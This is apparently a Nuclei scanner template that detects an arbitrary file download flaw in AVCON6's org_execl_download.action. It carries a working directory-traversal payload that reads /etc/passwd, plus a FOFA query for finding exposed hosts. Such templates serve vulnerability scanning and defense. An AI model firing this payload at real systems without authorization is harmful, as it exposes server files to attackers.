id: avcon6-execl-lfi

info:
  name: AVCON6 org_execl_download.action - Arbitrary File Download
  author: DhiyaneshDk
  severity: high
  description: |
    Arbitrary File Download vulnerability in the org_execl_download.action of the AVCON6 system management platform, through which an attacker can download arbitrary files from the server
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/AVCON6%20%E7%B3%BB%E7%BB%9F%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20org_execl_download.action%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="AVCON-6"
  tags: AVCON6

http:
  - method: GET
    path:
      - "{{BaseURL}}/org_execl_download.action?filename=../../../../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header
        words:
          - "application/octet-stream"
          - "filename="
        condition: and

      - type: status
        status:
          - 200

# digest: 4a0a00473045022100df723de6177d9d0a6d7cce09c173ae36b0a5998f442c1124a4b6f772ba78a4f6022033d180ae2f71e588e1c6e4a077b62ccb2276090e7b77d01b0fe1cddab9323efb:922c64590222798bb761d5b6d8e72950
